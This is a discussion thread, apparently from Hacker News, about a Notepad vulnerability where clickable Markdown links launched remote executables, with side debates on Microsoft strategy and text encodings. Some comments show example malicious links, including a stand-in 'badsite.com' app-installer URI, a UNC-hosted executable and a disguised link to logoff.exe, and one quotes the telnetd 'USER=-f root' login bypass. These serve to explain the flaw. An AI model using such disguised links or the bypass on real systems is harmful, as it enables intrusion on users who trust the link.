https://www.microsoft.com/investor/reports/ar25/index.html#
I can only think that they do not even care about Windows anymore, let alone Notepad...
Most of M$ office software has alternatives (Google Docs, OpenOffice...), M$ has no AI model and no AI labs to speak of, Github is constantly crashing and burning, Azure is garbage, and they uttery killed Xbox.
Oh and Linkedin is for actual psychopaths.
If Windows dies, all of their other junk that is attached to the platform will die as well.
What's delusional is making an unsubstantiated claims and then dismissing any counterarguments before they're made.
> Most of M$ office software has alternatives (Google Docs, OpenOffice...)
True. Yet MS Office is still the de facto standard.
> Github is constantly crashing and burning
True. But that doesn't mean it isn't still a business strategy for MS.
> Azure is garbage
Also true. But that doesn't mean it isn't profitable: "Microsoft Cloud revenue increased 23% to $168.9 billion."
> and they uttery killed Xbox
Quite the opposite. Xbox is thriving: "Xbox content and services revenue increased 16%."
> Oh and Linkedin is for actual psychopaths.
That's subjective. And even if it were true, that's got nothing to do with profitability (eg look at Facebook).
> If Windows dies, all of their other junk that is attached to the platform will die as well.
First off, literally no-one is claiming Windows is going to "die".
Secondly, even if it were to "die", you've provided no evidence why their other revenue streams wouldn't succeed when it's already been demonstrated that those revenue streams are growing, and in some cases, have already overtaken Windows.
I think they'll do just fine if Windows dies on the vine. They'll keep selling all the same software; even for PC gaming they already have their titles on Steam.
The evidence in TFA is that Microsoft is much more than Windows. So much more in fact that one can make a very reasonable argument that it's no longer a top priority for them.
The delusion is shutting your eyes, covering your ears, and screaming about how literally everyone except you is wrong.
The data putting Windows a ways down in revenue is likely correct, but I would argue that losing Windows could mean losing the others as well. Windows is their funnel to most other offerings (currently). Why is MS Office the standard? Why is Azure used? I know for certain that many purchases of Office and Azure were made because of legacy corporate policy of basing IT around Windows/AD. If everyone switched to Linux or MacOS, a lot of seemingly separate Microsoft products would probably die as a downstream effect.
This is true. Peruse r/LinkedinLunatics to see them in action
https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...
> An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files.
Notepad? Link handling?
That's like my pencil having a CVE that's to do with how it loads the ink. That old saying about 'if Microsoft built a car' is more true now than it was then: https://www.snopes.com/fact-check/car-balk/
Calculator hasn't been infiltrated by Copilot yet, but I'm sure the day is coming.
You're the preinstalled calculator!! You don't have to compete with other apps!!
1. Note about blah 2. Paste link to blah 3. Open that link later when reviewing my notes.
Blah is sometimes a web link, sometimes a link to a doc on my system, and sometimes a link to an item in my todo tracker. The better analogy is this is like a pencil having an eraser built in.
I use Drafts instead of Notepad, but if I used Notepad I would want to be able to easily open links in my notes. When I do find myself in Notepad, it's because I double clicked on a readme file that often contains links to resources I need.
If your computer was working, there was never really supposed to be a reason to invoke Notepad. Programmers were expected to install IDEs or third-party text-editor software. Microsoft's own READMEs have always been .rtfs ever since Windows 95. And so on. For a little while, you might use it to view system log files? But the Windows NT lineage gave Windows an Event subsystem with its own MMC-based console, so even that didn't require Notepad any more.
It's therefore bizarre that Microsoft have decided to "enhance" Notepad into this pseudo-rich-text thing, while also sunsetting Wordpad; when it seems like what they really wanted was to "enhance" Wordpad to also do what Notepad does, while sunsetting Notepad. (Even with full back-compat, they could have done this by making Notepad.exe a stub that launched Wordpad.exe with flags.)
> Occasionally, for no reason, your car would lock you out and refuse to let you in until you simultaneously lifted the door handle, turned the key, and grabbed the radio antenna.
> Every time GM introduced a new model, car buyers would have to learn how to drive all over again because none of the controls would operate in the same manner as the old car.
> You would press the 'start' button to shut off the engine.
If you live long enough, satire eventually becomes reality.
Even though I’m all against feature bloat, I think that making Markdown hyperlinks clickable is still within the Overton window of what a simple editor should be doing.
If you want Markdown use VSCode, it is a first class citizen. Don't take an intentionally stripped down text editor and bolt on VSCode-like features.
Because, almost entirely, the software development industry has disclaimed all responsibility. It's super common for people to try to do shit they have no experience or skill at, push their effort to be adopted by others, then when it crashes and burns they have no accountability. If software "engineers" adopted the rigors and accountability and dignity of traditional engineering, the industry would be very different.
It feels like a plague of ignorance and enshittification has silently taken over everything.
Markdown is more properly understood as a family of related-but-mutually-incompatible standards, like CSV, and like "supporting CSV" is a lot more complicated than meets the eye. And supporting Markdown is already clearly non-trivial compared to the baseline of Notepad we've come to expect over the past few decades.
The problem is that overall we seem to have fumbled both the concept and the implementation. There a bunch of vaguely similar but incompatible markdowns and apparently rendering them is too hard and people immediately reach for an enormous pile of software (usually a web stack) to render it for them.
It should have been entirely possible for a person to write a markdown parser in a couple hours and e.g. render paragraphs, bulleted lists and tables into a terminal.
You may be struggling a bit because you are reading some sort of moralization into the statement, some sort of emotional judgment, but there isn't any. It is clear that there does not exist a function that takes a span of "Markdown text" in and emits an abstract syntax tree that everyone agrees upon [1]. That's a fairly mathematical way of putting it, but even from an engineering point of view, the differences matter. Very quickly. It's not like you need to reach deep into crazy syntax to get to real, concrete disagreements between systems, you can hit problems with something as simple as
"_hello world _"
There are literally dozens of markdown formats now.
How we got there, why such a thing exists, as interesting as those questions may be none of them change the reality on the ground. There is no universal markdown to be appealed to. The closest is CommonMark, and that explicitly exists precisely because there was no consensus in the first place. If markdown was a format, CommonMark would never have been created.
[1]: Nor does its inverse, which at times is more frustrating to me than this. I have in mind what I want to do and either can't figure out how to do it or it simply can't be done.
But seriously though, all those weird markdown formats could easily just have their own custom parsers than then translate into the common format--supposing the common format is the union of all their features.
There's also a pretty large jump between "I can ask the system to open this link in the default browser" and "I have built my own link handling in a memory-unsafe language to support some really fringe features, and oops it's exploitable"
Replace Notepad with Chrome or Edge - clicking on a link downloads content from the Internet! Oh noes!
"An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files." https://msrc.microsoft.com/update-guide/vulnerability/CVE-20...
Imagine some Markdown:
[link](https://badsite.com)
[link](file://C:/windows/system32/cmd.exe)
[link](file://\\1.2.3.4\share\foo.exe)
[link](ms-appinstaller://?source=https://badsite.com/bad.appx)
What's beyond the pale is that MS's new Notepad highlighted custom URIs like the fourth link, and let you click to open it without a prompt. Even web browsers will prompt at least once with a special modal dialogue, the first time you click on a link to a custom URI. For safety, a text editor should stick to highlighting http/https/file URIs only.
That's the "RCE", in the same way that telling a Linux user to type "curl | sudo bash" in their shell is "RCE".
The fix is that clicking the link now gives a dialogue box asking if you really want to click it, and remember to click no if you're not sure.
Anyway, what this now has me thinking is, should protecting against this be expected to be done per-app or should it be at the OS level? It seems like it would make more sense to have the OS keep records on what application is allowed to open what kinds of links. Maybe with some mechanism to allow the app to cooperate with the OS if they want finer-grained permissions (such as a chat app passing the poster's user ID to the OS when invoking the link, so you could set an 'always allow' rule for links from specific users rather than the full app).
MS has WordPad... fck around with that to make it support markdown or whatever else beyond rtf you want it to support. For that matter, it's probably that much more appropriate to do so.
Do I typically use Notepad, no.. not really... I actually use the new rust based edit terminal app more than Notepad. That said, I expect notepad to do one thing... edit text files, and to not break doing so. The ONLY* addition that might be acceptable would be a HEX Editor mode, so you can edit any file.
There are maybe 5-7 applications in Windows I expect to never break... task manager, notepad, registry editor, file explorer, command prompt are at the top of that list... these are the golden tools that should never fail, even if everything else does.
I'm not sure if it's possible to get rid of the nag banner. And even if it is possible to get rid of it temporarily, it's probably not possible to get rid of it permanently.
I will find out...
Like, if I have a h2 or url, its going to show as special text rather than the h2 tag?
I mean... other than it creating vulnerability... and maybe is the beginning of the end of notepad as a plain text editor...
Is this not a problem with anything that offers a preview of markdown (or HTML, or anything with embedded links)?
And the problem is a notepad app is expected to be dead simple, have few features, and be hard to get wrong while implementing.
1. You can use UNC paths to access remote servers via SMB
2. Even if it's local, it's still more useful than you make it out to be. For instance, suppose you downloaded a .zip file of some github project. The .zip file contains virus.exe buried in some subfolder, and there's a README.md at the root. You open the README.md and see a link (eg. "this project requires [some-other-project](subfolder\virus.exe)". You click on that and virus.exe gets executed.
Relevant article from The Old New Thing: https://devblogs.microsoft.com/oldnewthing/20060509-30/?p=31...
Programs (this is true for most mainstream operating systems) can become network facing without realizing it. I've sometimes found a bunch of Windows programs sometimes tends to assume that I/O completes "instantly" (even if async I/O has been common on Windows for a very long time) and don't have a good UX for cancelling long running I/O operations
[Free AI credits](C:\windows\system32\logoff.exe)
No bold text, italics, bullet points, invisible html.. Just get the text and can copy it to paste again somewhere else.
Ala Cmd+Shift+V on Mac
ETA: I only noticed yesterday because a "sponsored suggestion" popped up when I was typing, which I've not seen before. So either they actually enabled it recently, or advertisers don't bid on the kinds of things I usually type.
I've always have a suspicion that even with auto complete off, some sort of telemetry or obscure feature is still leaking browser address bar text.
ctrl-l is for the address box
At most I want the address box to do is look up a dns name. Which can still be a risk if I were to hit "enter" with sensitive information which could in some cases get pushed out to my DNS provider (which is me, but then it's possible the address would be pushed out to another resolver, and will also be logged in an unexpected place)
Amazingly still works on Win 11 and still seems to keep it local (bypassing the windows search), so I'm pleased to report consistent results for 30 ish years.
Of course, now I've mentioned it out loud, it'll be the next thing to go...
I don't know if it's just me being old and grumpy, but everything windows 8 and later (server 2003) seems like half-baked, unfinished enshittification. Trying to do something even vaguely "advanced" to a network adapter puts me back in windows 95 land along with the run box. The "manage" pane with device & disk manager and logs is from a totally bygone era yet it seems to still be the only way of getting that information. The worst bit is, I'm not complaining. All the bits that look and feel like they've been forgotten since Windows 2000 are the easiest, least infuriating bits of the system I interact with.
Obsidian has a mildly infuriating default of opening previews with ctrl shift v keys instead of pasting with no formatting.
Did you implement .LOG and Unicode support with BOM handling?
The windows 7-10 versions that could open anything would just get stuck for half an hour when you opened the wrong thing in them, which was rather annoying.
Bonus point: that Windows 95 style "error" beep when pasting too large image. Always sends the shiver down the spine and confuses the coworkers around (we're an all-Mac shop).
Windows 11 also takes a huge amount of time to get working as i intend. I have to remove a lot of 'features' and heavily optimize some processes. It's stable and it works, but i'm getting more and more annoyed by it that upcoming updates sometimes destroy all my effort.
Kinda wish i could run everything my family wants on Debian. I know i could do that right now, but the wife and kids will never get used to that if they have to use Microsoft products in their working and school life.
You won't know until you try. My mum used all versions of Windows from 3.1 till Windows 7. She hated Windows 8, and that's when I decided to switch her to Linux (with XFCE) - and she felt the UI was a lot more familiar to her than Windows 8. I recently showed her a few screenshots of Windows 11, and she finds her current desktop (now on KDE) a lot more familiar than Windows 11. Same with Office, she prefers the older style toolbar of LibreOffice than the ribbon UI of modern versions Office.
So maybe install it on a spare device as a trial and see how they like it?
The Web versions of Office, err MS 365, err CoPilot App.. (OMG!>!!>) ... aren't so bad to use in a Linux browser either.
Google Docs works fine for me in Firefox as well.
But some things just don’t run there (properly).
Like Assetto Corsa EVO or SimHub.
[1] https://www.protondb.com/app/3058630 [2] https://www.simhubdash.com/community-2/simhub-support/guide-...
But… ACC EVO is alpha at the moment. It barely runs without bugs on Windows. It’s just less hassle on Windows.
https://gs.statcounter.com/windows-version-market-share/desk...
Not sure what caused the inflection point in December 2025.
Better to have no alpha-transparency than whatever this is. At least old Paint just turned it white, and you could manipulate the white layer, with this working with the alpha layer is a nightmare.
I try to use Pinta/Paint.Net, but it's not quite as good as I remember psp being. I don't even hate the newer MS Paint... thought I'm only on windows for my work environment and even then.
Aside: I've been using my personal computer more, so I can work on a limited surface with docker and ai agent, then just bring in the components I'm working on when ready. My work environment is really locked down, no wsl, no docker... and it's like working in 2002 to some extent... It's literally easier for me to create stand-alone projects, work on a given feature in complete isolation... AI agent mostly to boilerplate the environment and most of the automated sanity tests, then I can focus on just what I'm working on.
I copied out mspaint.exe and some resource files as well were needed.
It runs for me without error.
Update - it's just the games; I thought it had notepad and calc as well
It's because the program just calls a Windows API to display the version dialog of Windows itself.
[0] In the unlikely case that it isn’t there, you can add it through System > Optional Features > Add an optional feature.
By using a version that is _that_ old you do lose out on some of the actually useful updates legacy nodepad received, such as LF line ending support.
Most of the features that were added in later versions: unicode, tabs, auto-reload, support for large files. CTRL+S is also nice.
AI! It needs AI. Did I guess it right?
For many built in windows apps, the 'about this program' menu item just invokes a separate program, 'winver'. If you go Start -> Run and type in winver, it does the same thing.
Wordpad was the same but a rich text editor control.
There’s very little need for it to have ever become more.
https://github.com/christian-korneck/classic-windows-notepad
Extract both the ISO and reactos.cab wth 7zip.
This has prompted me to move on from Notepad++ - it's sad, because I've used it for many years, but this is too much.
One could argue it's an issue with windows where you can't just pull updates using a package manager/app store.
But I guess that's what you get when you fragment your ecosystem in apt, snap and gnome extension manager. I need to master nix asap.
Ok, tabs, I do like the tabs.
At this point, what am I supposed to do other than uninstall Windows completely? No real sandboxing, a mountain of legacy…
Windows is just a mountain of shit.
telnetd CVE-2026-24061. It's embarrassingly simple exploit but took years to be discovered.
> When telnetd invokes /usr/bin/login, it passes the USER value directly. If an attacker sets USER=-f root and connects using telnet -a or --login, the login process interprets -f root as a flag to bypass authentication, granting immediate root shell access.
Why does every Linux distro under the sun try so hard to protect the garbage under /usr/bin/ and /etc/ when literally the only files that matter to me are in /home, which is a free-for-all?
As for the desktop community… Well, it has a severe lack of professionals.
Because a compromised user could infect shared executables and spread the infection. A bit harder to do with etc but for sure possible. The main target would be infecting bash and you are done from the get go.
>when literally the only files that matter to me are in /home, which is a free-for-all?
The home folder's read write is usually restricted to the user. The only scenario where this isn't the case to my knowledge is Ubuntu where others can read it, but this is just a huge flaw in Ubuntu that almost no other distro has.
> The home folder's read write is usually restricted to the user.
Yeah, and that is the point. All user's programs including curl, wget, the web browser, anything else that connects to the network run as the user, and all the user's programs, by default, have access to everything inside ${HOME}.
Most people don't really care if /bin gets obliterated, but they do care dearly when /home/joe/photos/annies-2nd-birthday gets wiped.
You can always have two user accounts: oblio and unsafe-oblio anf have a shared folder between the two for transferring files. Or invest into some backup software.
And no, it's not "a lot of work" it's the bare minimum
We have supposedly all the smartest minds in the world working in tech and they haven't been able to create a simple, cheap, reliable cross platform solution for user data protection, backup and restore.
It's easier to blame users instead.
Yes, because the users are in fact the problem. The options are either to trust the user to make decisions (and technically illiterate users will screw things up for themselves), or lock down the system so that the user isn't allowed to do anything the corporate overlord doesn't let them. There is no middle ground.
Provide more education and guidance for users and more corporate controls.
If they would have really started to do this in 2005, we would have been there by now. Instead we get more UI toolkits and more UI refreshes and AI everywhere.
I even signed it and everything.
I always thought Americans were "nanny state this, nanny state that". Doesn't this also apply to huge state sized corporations mandating a cut of every app sold and forcing everyone to only install apps from them?
Oh, what do you mean there's also SELinux, Snap, Flatpack, Docker, Podman, ...?
https://github.com/microsoft/edit
Yeah, it's a re-creation of edit, but it's pretty great... also runs outside windows.
Uninstall Windows completely 4 years ago when Windows 11 was released heralding in a new era of absolutely insane, self-destructive, unnecessary and unwanted shit?
There is no valid excuse for this vulnerability. It's existence is a category error that's only possible because Microsoft has completely jumped the shark. Continuing to use /any/ of their products is a choice to accept pure insanity as a default.
You have:
- Windows Sandbox (consumer-level sandbox) - Creating a separate User (User folders are permission locked to their user by default, system binaries cannot be modified without admin access) - HyperV (VM hypervisor) - Edge Browsers
Don't get me wrong MSFT quality is dropping steeply, but this is still a strong point. For comparision, on Ubuntu, user folder by default can be read by all users.
Common practice, and even encouraged by Windows itself, is having the administrator account be the only account. This misuse is a very common thread in Windows systems, and security breaches alike.
Many Linux distros are also guilty of this, disabling the root account by default and having the only user have sudo privileges, just like Windows.
This hasn't been true since Vista. Kind of even before that with XP, it really showcased using multiple accounts to home users with a much more stylized user selection screen.
For nearly thirty years, notepad.exe was the gold standard for a "dumb" utility which was a simple, win32-backed buffer for strings that did exactly one thing...display text. An 8.8 CVSS on a utility meant for viewing data is a fundamental failure of the principle of least privilege.
At some point, they need to stop asking "can we add this feature?" and start asking "does this text editor need a network-aware rendering stack?"
They didn’t stop there. They also asked “does this need AI?” and came up with the wrong answer.
Microsoft’s product managers however have no imagination, and so they insist on just mindlessly shoving obnoxious Copilot buttons everywhere.
> How do I add more features to get a promotion
- Successfully led key efforts to modernize aging platform technologies
- Directed integration of cutting-edge system-wide artificial intelligence functionality
Gee thanks for helping me find the button I'll use literally once and making me hunt for the one I'll need the other 99999 times I use this service.
Existing users can go fuck themselves as long as new people are registering. Line go up!
It's easy to say you will, and very hard to actually do it.
In life you have to choose your battles.
Because the society in US is arranged as a competition with no safety net and where your employer has a disproportionate amount of influence on your well being and the happiness of your kids.
I'm not going to give up $1M in total comp and excellent insurance for my family because you and I don't like where AI is going.
I'll have to explain it to the wife: "well, you see, we cant live in this house anymore because AI in Notepad was just too much".
I'll dial up my ethical and moral stance on software up to 11 when I see a proper social safety net in this country, with free healthcare and free education.
And if we cant all agree on having even those vital things for free, then relying on collective agreement on software issues will never work in practice so my sacrifice would be for nothing. I would just end up being the dumb idealist.
I don't think you should make any change you don't want to, I'm not arguing for collective agreement on anything, and I'm not convinced there's a big ethical case for or against AI, even in Notepad.exe. If you can make $1M, go nuts, I just think it's not a great example of dealing with ethics & tradeoffs.
I was more just reacting to your the contrast between ideas early in this thread, and your implication of a $1M comp. Early in the thread there was implication that poor/exploited/low-level workers with few other options were either being blamed for AI in notepad, or should not be blamed. Then you casually drop the $1M comp line. Maybe that's real, maybe it's not but regardless, it felt silly to compare the earlier population with people who can or have made $1M. Of course we all face challenges, and the hedonic treadmill calls for us equally at $1K/year and $1M/year, I just think people in the latter have objectively more options, even if the wife complains, than people in the former, and it's tough to take the latter seriously when they talk about lifestyle adjustments.
There is always someone who will take advantage of the prisoners dilemma.
Well, except that this did not prevent it from having embarrassing bugs. Google "Bush hid the facts" for an example. I'm serious, you won't be disappointed.
I think complexity is relative. At the time of the "Bush hid the facts" bug, nailing down Unicode and text encodings was still considered rocket science. Now this is a solved problem and we have other battles we fight.
> and we have other battles we fight.
Except no, we don't. notepad.exe was DONE SOFTWARE. It was feature complete. It didn't have to change. This is not a battle that needed fighting, this was hitting a brick wall with ones fist for no good reason, and then complaining about the resulting pain.
https://en.wikipedia.org/wiki/Windows_Notepad#Change_in_deve... https://en.wikipedia.org/wiki/WordPad#Discontinuation
They likely knew nobody would be drawn to WordPad by the additions, so they had to scavenge their rapidly diminishing list of actually useful software for sacrifices on the altar to their outrageous AI investments.
This definition in the first paragraph on Wikipedia matches my understanding of it as a security consultant:
> The ability to trigger arbitrary code execution over a network (especially via a wide-area network such as the Internet) is often referred to as remote code execution (RCE or RCX). --https://en.wikipedia.org/wiki/Arbitrary_code_execution
Issues in handling local files, whether they require user interaction or not, are just that
Doesn't take away from the absurdity that notepad isn't a notepad but does extensive file contents parsing
While 8.8 score is embarrassing, by no measure notepad was done software. It couldn't load a large text file for one, its search was barely functional, had funky issues with encoding, etc.
Notepad++ is closer to what should be expected from an OS basic text editor
Also, I hope the irony of you citing Notepad++ [1] as what Notepad should aim to be isn't lost on you. My point being, these kinds of vulnerabilities shouldn't exist in a fucking text editor.
[1] https://notepad-plus-plus.org/news/hijacked-incident-info-up...
Regarding large, I am referring to log files for example. I think the issue was lack of use of memory mapped files, which meant the entire file was loaded to RAM always, often giving the frozen window experience
Remote into a machine that you're not allowed to copy data out of. You only have the utilities baked into Windows and whatever the validated CI/CD process put there. You need to open a log file that has ballooned to at least several hundred megabytes, maybe more.
Moby Dick is about 1MB of text. That's really not much compared to a lot of log files on pretty hot servers.
I do agree though, if we're going to be complaining about how a text editor could have security issues and pointing to Notepad++ as an example otherwise, its had its own share of notable vulnerabilities even before this update hijacking. CVE-2017-8803 had a code execution vulnerability on just opening a malicious file, this at least requires you to click the rendered link in a markdown file.
Honestly I'm okay with having to resort to power tools for these edge cases. Notepad is more for the average user who is less likely to run into 100 MB text files and more likely to run into a 2 kB text file someone shared on Discord.
There's no reason it shouldn't handle both use cases.
I get what you're saying. But if things were done right I probably wouldn't have to be remoting into this box to hunt for a log file that wasn't properly being shipped to some other centralized logging platform.
Plus for many years Word was one of the main cash cows for MS, so they didn't want to make an editor that would take away from Word.
And you could see how adding new things adds vulnerabilities. In this case they added ability to see/render markdown and with markdown they render links, which in this case allowed executing remote code when user clicks on a link.
Wordpad was the bundled rich text editor and was also a mess
I don't think an improved notepad could have cannibalized Word
Notepad++ is a monster software.
It was working according to the spec. Which is very unusual in the SW world.
I wish…
Detecting text encoding is only easy if all you need to contend with is UTF16-with-BOM, UTF8-with-BOM, UTF8-without-BOM, and plain ASCII (which is effectively also UTF8). As soon as you might see UTF16 or UCS without a BOM, or 8-bit codepages other than plain ASCII (many apps/libs assume that these are always CP1252, a superset of the printable characters of ISO-8859-1, which may not be the case), things are not fully deterministic.
Thankfully UTF8 has largely won out over the many 8-bit encodings, but that leaves the interesting case of UTF8-with-BOM. The standard recommends against using it, that plain UTF8 is the way to go, but to get Excel to correctly load a UTF8 encoded CSV or similar you must include the BOM (otherwise it assumes CP 1252 and characters above 127 are corrupted). But… some apps/libs are completely unaware that UTF8-with-BOM is a thing at all so they load such files with the first column header corrupted.
Source: we have clients pushing & pulling (or having us push/pull) data back & forth in various CSV formats, and we see some oddities in what we receive and what we are expected to send more regularly than you might think. The real fun comes when something at the client's end processes text badly (multiple steps with more than one of them incorrectly reading UTF8 as CP1252, for example) before we get hold of it, and we have to convince them that what they have sent is non-deterministically corrupt and we can't reliably fix it on the receiving end…
Ah so that’s the trick! I’ve run into this problem a bunch of times in the wild, where some script emits csv which works on the developers machine but fails strangely with real world data.
Good to know there’s a simple solution. I hope I remember your comment next time I see this!
Due to (parts of?) the EU using then comma as the decimal separator, you have to use another symbol to separate your values.
It wouldn't normally necessitate not using comma as the field separator in CSV files though, wrapping those values is quotes is how that would usually be handled in my experience.
Though many people end up switching to “our way”, despite their normal locale preferences, because of compatibility issues they encounter otherwise with US/UK software written naively.
Unfortunately people like CSV to be at least part way human-readable, which means readable delimiters, end-or-record markers being EOLs that a text editor would understand, and the decimal/thousand/currency symbols & date formatting that they are used to.
In the text files we get from clients we sometimes see tab used instead of comma, or pipe. I don't think we've seen semicolon yet, though our standard file interpreter would quietly cope¹ as long as there is nothing really odd in the header row.
--------
[1] it uses the heuristic “the most common non-alpha-numeric non-space non-quote character found in the header row” to detect the separator used if it isn't explicitly told what to expect
It's maddening and it's frustrating. The US doesn't have any of these issues, but in Europe, that's a complete mess!
Adding a BOM makes it incompatible with ASCII, which is one of the benefits of using UTF-8.
One of the key advantages of UTF8 is that all ASCII content is effectively UTF-8. Having the BOM present reduces that convenience a bit, and a file starting with the three bytes 0xEF,0xBB,0xBF may be mistaken by some tools for a binary file rather than readable text.
I think you mean “the US chooses to completely ignore these issues and gets away with it because they defined the basic standard that is used, ASCII, way-back-when, and didn't foresee it becoming an international thing so didn't think about anyone else” :)
I thought it was EBCDIC /s
UTF-8 always has the same byte order,[5] so its only use in UTF-8 is to signal at the start that the text stream is encoded in UTF-8...
Not using a BOM allows text to be backwards-compatible with software designed for extended ASCII. For instance many programming languages permit non-ASCII bytes in string literals but not at the start of the file. ...
A BOM is unnecessary for detecting UTF-8 encoding. UTF-8 is a sparse encoding: a large fraction of possible byte combinations do not result in valid UTF-8 text.
One particular English-speaking country… The UK has issues with ASCII too, as our currently symbol (£) is not included. Not nearly as much trouble as non-English languages due to the lack of accents & such that they need, but we are still affected.
When I open something in Notepad, I don't expect it to be a possible attack vector for installing ransomware on my machine. I expect it to be text. It being displayed incorrectly is supposed to be the worst thing that could happen. There should be no reason to make Notepad capable of recognizing links, let alone opening them. Save that crap for VS Code or some other app I already know not to trust.
In fact, those were the good days, when a mere affair with your secretary would be enough to jeopardize your career. The pendulum couldn't have swung more since.
Oh, here is the file I just saved... I see that it now tells me to rob a bank and donate the money to some random cult I'm just learning about.
Let me make a web search to understand how to contact the cult leader and proceed with my plan!
(luckily LLMs were not a thing back then :) )
Is that so? I ran pretty often in problems with programs having trouble with non-ANSI characters
I actually built a "dumb" alternative in Rust last week specifically to escape this. It’s a local-only binary—no network permissions, encrypted at rest, and uses FIPS-compliant bindings (OpenSSL) just to keep the crypto boring and standard.
It’s inspectable if you want to check the crate: https://github.com/BrowserBox/FIPSPad
The specific gap this fills is 'Defense in Depth' + compliance. OS-level encryption (like FDE) is transparent once you log in. If you walk away from an unlocked machine, FDE does nothing.
App-level encryption, however, ensures the specific sensitive notes remain encrypted on disk even while the OS is running and the user is authenticated.
It's also portable as it allows the encrypted blob to be moved across untrusted transports (email, USB, cloud) without needing to set up an encrypted container/volume on the destination.
For FIPS/NIST workflows, relying solely on the OS often isn't enough for the auditor; having the application control the keys explicitly satisfies the 'data protection' control regardless of the underlying storage medium.
...then I might as well ask what happens when I walk away from the encrypting edior while a file is still open. User Error can happen with any encryption or security schema. Pointing out a trueism is not an argument.
> It's also portable
So is encrypting files using a specialized tool. I don't need my editor to do this. The entire point of my criticism, and indeed the entire point of this thread, is that software that should focus on a narrow task, tries to do way too much, leading to problems.
Considering that walking away from an open editor means also walking away from an unlocked machine, the problem would be the exact same ;-)
"Problems ? No problems. Profit."
Regards (insert your favourite 3 letter agency or exploit sellers here)
Using FIPS mode can be insecure because the latest FIPS-compliant version can be years older than the latest non-FIPS one with all the updates.
The only time it makes sense to use the FIPS version is where there is a legal or contractual requirement that trumps security considerations.
There's no insecurity like compliant cybersecurity :)
To meet FIPS 140-3, I can't roll my own crypto; I have to use a validated module.
I actually only link OpenSSL on Linux, and then only if it's in FIPS-mode. On Windows (CNG) and macOS (CoreCrypto), I use the native OS primitives to avoid the dependency and keep the binary small.
Every text editor, if it survives long enough, will end up implementing a partial, bug-ridden version of Emacs.
Every text editor, including Emacs [...].
Altough now I'm using 9front, Sam and Acme. I feel myself weird not using the keyboard but at least I understood structural expressions for Sam/Acme really fast, first with 'Vis' and next under Acme. Oh, Acme can do mail and news and a bunch more... because it has I/O since the beginning, you can plug anything into it, from commands to the text buffer to sockets. Even a crude HN client if you dare.
But so far as I can tell the bug isn't related to "network-aware rendering stack" or AI (as other people are blindly speculating)?
From MSRC:
>How could an attacker exploit this vulnerability?
>An attacker could trick a user into clicking a malicious link inside a Markdown file opened in Notepad, causing the application to launch unverified protocols that load and execute remote files.
Sounds like a bug where you could put an url like \\evil.example\virus.exe into a link, and if a user clicks it executes virus.exe
You were never able to "click a link" in Notepad in the past.
Mixing responsibilities brings with it lots of baggage, security vulnerabilities being one of them.
Despite the scary words and score this wouldn't even be a vulnerability if people weren't so hard wired to click every link they see. It's not some URL parsing gone wrong triggering an RCE. Most likely they allowed something like file:// links which of course opens that file. Totally valid link, but the feature must be neutered to only http(s):// because people.
This is so 80s. Now we have systemd (svchost.exe), wayland (explorer) and a webbrowser (chrome). You don't need more.
Another in 2004: https://www.cve.org/CVERecord?id=CVE-2002-1377
Neither vim nor Notepad are purely for displaying text though.
Up until fairly recently, that's exactly all Notepad did.
Vim has those bugs because of bloat, and now Notepad does too. AI, Markdown, Spellchecker, etc, nobody asked for this bloat.
notepad was always a plain text editor. It had enough problems with unicode and what that means to be "plain text".
[1] (native GUI widgets? agggh)
But a few months ago, I gave 11 a shot on my gaming PC Windows partition, because 10 had reached end of life, and Minecraft refused to work on it at all, Minecraft then required the store login, without any recourse.
So I wiped out the Windows partition and decided Java Edition on Linux was good enough. My kids stopped playing Bedrock anyway. All the other games I cared about worked on Linux too.
For me, that's really just Rocket League, but that might die when EAC is added, so another toxic company might be out of my life soon. It'll be sad after 4k hours, but I expected the day to come the day Epic took over.
Sober for Roblox is good enough for occasional play with the kids.
And just 1 person at work is keeping Windows alive, hopefully they're going to retire soon.
Everyone has to prove their worth by involving more people in ever embiggening trainwrecks every quarters in this day and age just to maintain employment, and without tangibly threatening anyone else's while at it. That's where the features are coming from. That's what needs to be fixed. Which also goes way beyond engineering.
I read the cwe not cve, was wrong. It's still early in the morning...
> The malicious code would execute in the security context of the user who opened the Markdown file, giving the attacker the same permissions as that user.
I am certain you are mistaken. I couldn't find anything that hints at notepad running with elevated privileges.
In fact, if you enabled developer mode on your computer there's a registry key that gets set to run notepad as admin, it's: `runas /savecred /user:PC-NAME\Administrator “notepad %1”` in HKEY_CLASSES_ROOT-> * -> shell -> runas (new folder) -> (Default)
And, if I'm not totally mistaken, notepad also has the ability to reopen files as administrator, but I don't remember how to invoke it.
Regardless, notepad is a very trusted application and is often run as Administrator. Often it's more trusted than any other utility to modify system files.
I think that's a notepad plus plus feature. I had it offer to reopen itself as administrator when editing system files like HOSTS.
Sorry to say this, but Notepad was a very trusted application now. I cannot believe that such a core utility has a 8.8 CVE, it sounds like a joke tbh.
These are sad times.
https://learn.microsoft.com/en-us/answers/questions/3845356/...
You basically have to find the "execution alias" setting and disable notepad and you get the ole reliable :D
OLD POST:
This has hurt me specifically. Since I work without IDEs, no VIM, no vs code. On linux I use nano, on windows I use Notepad. I like the minimalism and the fact that I have absolute control, and that I can work on any machine without needing to introduce an external install.
Last couple of years notepad started getting more features, but I'm very practical so I just ignored them, logged out of my account when necessary, opted out of features in settings, whatever.
But now this moment feels like I must change something, we need a traditional notepad.exe or just copy it from a previous version, I'll try adding NOTEPAD.exe to a thumb drive and having that. But it's a shame that it breaks the purity of "working with what's installed".
I've since migrated to Linux 100% (outside of work) and whilst there are the odd annoyances, it's been a breath of fresh air compared to Windows. And I can have a good chuckle almost once a week these days with each new Windows consumer hostility coming across the HN front page.
Oh, a kindred spirit!
I too absolutely love the notion of the base install, and what can be done just by means of its already available toolset.
(Fun tidbit: Did you know Windows comes with a bare bones C# 5 toolchain, with csc.exe, and even vbc.exe and jsc.exe?)
Even with MSBuild 4. From the days when .NET Framework was an OS component and also the build tools (until Roslyn) were part of the Framework.
If you’re going to have a custom config, you might as well have a custom executable.
Not saying that spending the first days on a new project configuring your custom setup with the company's stack is bad, especially if you are categorizing as employee and are looking for a multi year long run. But I tend to do small contracts, 1 to 6 months, and starting right away is a nice boost.
Shh, please. If MS find out, they'll add a parrot to "improve" it.
now that llms exist I am learning with dotnet, that now comes with windows, (or at least it comes with winget, and you can install a lot of kosher software, which is almost as good as having it preinstalled.)
